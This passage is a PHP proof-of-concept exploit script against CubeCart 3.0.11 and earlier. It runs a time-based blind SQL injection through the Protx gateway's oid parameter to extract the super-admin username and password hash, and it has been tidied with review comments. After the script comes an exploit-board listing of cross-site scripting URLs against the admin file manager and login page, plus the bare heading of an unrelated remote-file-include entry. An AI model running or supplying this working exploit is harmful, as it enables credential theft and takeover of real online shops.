
echo 'No response from proxy ';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {

$html.=fread($ock,1);

}

}

fclose($ock);

#debug

#echo "\r\n".$html;

}

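// ---- command line -------------------------------------------------------
// usage: php <this script> <host> </path/to/cubecart/> [-pPORT] [-PPROXY:PORT]
//        [-TPREFIX] [-aITERATIONS] [-s] [-d]
// Every option is glued to its value (e.g. -p8080, -TCubeCart_), as in the
// original proof of concept. Unknown options are ignored, as before.
if ($argc < 3) {
    die("usage: php ".$argv[0]." <host> </path/to/cubecart/> [-pPORT] [-PPROXY:PORT] [-TPREFIX] [-aN] [-s] [-d]\n");
}

$host = $argv[1];
$path = $argv[2];
$port = 80;
$prefix = "CubeCart_";                              // default table prefix; -T sets it, -d tries to detect it
$delay_func = "benchmark(2000000,sha1('suntzu'))";  // MySQL expression that stalls the query on a correct guess
$dt = 0;                                            // -d: read the real prefix out of a MySQL error page first
$proxy = "";                                        // -P: host:port of an HTTP proxy; requests then use absolute URLs

for ($k = 3; $k < $argc; $k++) {
    $arg = $argv[$k];
    // substr() is safe on one-character arguments; $arg[1] raised a notice there.
    $flag = substr($arg, 0, 2);
    // Take the rest of the argument verbatim: the old str_replace("-T", "", ...)
    // also removed the flag text from anywhere inside the value.
    $val = (string) substr($arg, 2);   // cast: substr() past the end returns false on old PHP
    switch ($flag) {
        case "-p":
            $port = $val;
            break;
        case "-P":
            $proxy = $val;
            break;
        case "-T":
            $prefix = $val;
            break;
        case "-a":
            // Custom benchmark() iteration count; intval() keeps the SQL numeric.
            $delay_func = "benchmark(".intval($val).",sha1('suntzu'))";
            break;
        case "-s":
            // sleep(11) comfortably exceeds the "> 10 seconds" decision threshold
            // used by the extraction loops below.
            $delay_func = "sleep(11)";
            break;
        case "-d":
            $dt = 1;
            break;
    }
}

// The path must be absolute on the target and end with '/', because
// "modules/gateway/Protx/confirmed.php" is appended to it directly.
// The empty-string guard avoids indexing $path[0] on an empty argument.
if ($path === '' || $path[0] !== '/' || substr($path, -1) !== '/') {
    echo 'Error check the path!';
    die;
}

// Through a proxy the request line has to carry the absolute URL.
// $p is the request-path prefix used by every packet built below.
if ($proxy == '') {
    $p = $path;
} else {
    $p = 'http://'.$host.':'.$port.$path;
}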

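// ---- optional table-prefix detection (-d) -------------------------------
// Sends a lone quote as the oid value; when the application prints the MySQL
// error, the failing statement ("UPDATE <prefix>sessions ...") exposes the real
// table prefix. sendpacketii() is defined earlier in the file and, the way the
// original script uses it, leaves the response text in the global $html.
if ($dt) {
    $packet  = "GET ".$p."modules/gateway/Protx/confirmed.php?oid=".base64_encode("'")."&crypt=1 HTTP/1.0\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    sendpacketii($packet);

    // eregi() was removed in PHP 7; a case-insensitive substring test is all that is needed.
    if (stripos($html, "in your SQL syntax") !== false) {
        // Guard both explode() steps: the original indexed $temp[1] blindly, which
        // raised a notice and left $prefix empty when the error text had no "UPDATE ".
        $after_update = explode("UPDATE ", $html, 2);
        if (count($after_update) == 2 && strpos($after_update[1], "sessions") !== false) {
            list($prefix) = explode("sessions", $after_update[1], 2);
            echo "prefix -> ".$prefix."\n";
        } else {
            echo "prefix not found in the error output, keeping ".$prefix."\n";
        }
    }
}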

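// ---- blind, time-based extraction ---------------------------------------
// Injection point: the base64-decoded `oid` parameter of
// modules/gateway/Protx/confirmed.php (sent with crypt=1). For every byte
// position the script asks MySQL to run $delay_func when the guessed byte
// matches; a response that takes more than 10 seconds is treated as a hit.
//
// NOTE(review): the captured listing shows the keyword as "WHE RE" in both
// loops at the same column, which MySQL would reject; this is read as a
// line-wrap artifact of the document conversion and restored to "WHERE".

/**
 * Recover one column of the isSuper=1 row of <prefix>admin_users, one byte
 * at a time, from the response time of the injected IF(...).
 *
 * Extraction stops when position $pos reports byte 0: SUBSTRING() past the
 * end of the value yields an empty string whose ASCII() is 0, which the
 * original script used as its end-of-string marker.
 *
 * @param string $column     column to read (e.g. "password", "username")
 * @param int[]  $candidates byte values to try for each position, in order
 * @param string $label      name printed in the progress output
 * @param string $url_path   request-path prefix ($p), ends with '/'
 * @param string $host       value of the Host header
 * @param string $prefix     table prefix (e.g. "CubeCart_")
 * @param string $delay_func MySQL expression that stalls the query on a hit
 * @return string the recovered value, including the terminating NUL byte
 *                (later checks rely on trim() to drop it)
 */
function blind_extract_column($column, $candidates, $label, $url_path, $host, $prefix, $delay_func)
{
    $value = "";
    for ($pos = 1; ; $pos++) {
        $hit = null;   // 0 is a valid hit, so the sentinel must be null, not 0
        foreach ($candidates as $byte) {
            // /**/ stands in for spaces; the trailing /* comments out the rest of the query.
            $sql = "999999%'/**/or/**/basket=(SELECT(IF((ASCII(SUBSTRING(".$column.",".$pos.",1))=".$byte."),".$delay_func.",0))/**/FROM/**/".$prefix."admin_users/**/WHERE/**/isSuper=1)/*";
            echo "sql -> ".$sql."\n";
            $encoded = base64_encode($sql);
            echo "encoded -> ".$encoded."\n";

            $packet  = "GET ".$url_path."modules/gateway/Protx/confirmed.php?oid=".$encoded."&crypt=1 HTTP/1.0\r\n";
            $packet .= "Host: ".$host."\r\n";
            $packet .= "Connection: Close\r\n\r\n";

            // Pause between probes so a still-running delayed query from the
            // previous request does not distort the next timing.
            usleep(2000000);
            $starttime = time();
            sendpacketii($packet);
            $endtime = time();
            echo "starttime -> ".$starttime."\n";
            echo "endtime -> ".$endtime."\n";
            $difftime = $endtime - $starttime;
            echo "difftime -> ".$difftime."\n";

            // time() has one-second resolution; the 10-second threshold is what
            // the delay functions (benchmark(2000000,...) / sleep(11)) are sized for.
            if ($difftime > 10) {
                $hit = $byte;
                break;
            }
        }
        if ($hit === null) {
            // No candidate produced a delay: wrong prefix, too small -a, or no isSuper row.
            die("Exploit failed ");
        }
        $value .= chr($hit);
        echo $label." -> ".$value."[???]\n";
        sleep(1);
        if ($hit === 0) {
            return $value;
        }
    }
}

// The password is stored as a hex MD5 digest, so only NUL (terminator),
// '0'-'9' and 'a'-'f' need to be tried; the username gets the full byte range.
$chars = array_merge(array(0), range(48, 57), range(97, 102));

$password = blind_extract_column("password", $chars, "password", $p, $host, $prefix, $delay_func);
$admin = blind_extract_column("username", range(0, 255), "admin", $p, $host, $prefix, $delay_func);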

// Final report of what the two timing loops recovered. Both $admin and
// $password still end with the NUL byte that stopped their loops, so this
// output contains that byte too.
print_r('

-

admin -> '.$admin.'

password (md5) -> '.$password.'

-

');

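/**
 * Tell whether $hash looks like a lowercase hex MD5 digest.
 *
 * trim() also strips a trailing NUL, so the terminator left on $password by
 * the extraction loop does not break the check. ereg() was removed in PHP 7,
 * hence preg_match(); the pattern is now anchored at both ends so that a
 * longer hex string is not accepted as a 32-character digest.
 *
 * @param string $hash
 * @return bool
 */
function is_hash($hash)
{
    return preg_match('/^[a-f0-9]{32}\z/', trim($hash)) === 1;
}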

// Success is claimed only when the recovered password has the shape of an MD5 digest.
echo is_hash($password) ? "Exploit succeeded " : "Exploit failed ";

?>

black_hat_cr(HCE)

CubeCart <= 3.0.11 SQL injection & cross site scripting

1. SQL injection (time-based blind; proof of concept above, write-up at the link below):

Code:

http://retrogod.altervista.org/cubecart_3011_sql_mqg_bypass.html

2. XSS (cross-site scripting) in the admin file manager preview and the admin login page:

Code:

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&x="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/filemanager/preview.php?file=1&y="><script>alert(document.cookie)</script>

http://[target]/[path_to_cubecart]/admin/login.php?email="><script>alert(document.cookie)</script>

black_hat_cr(HCE)

cutenews aj-fork <= 167f (cutepath) Remote File Include Vulnerability

Code:

===========================================================

================================================
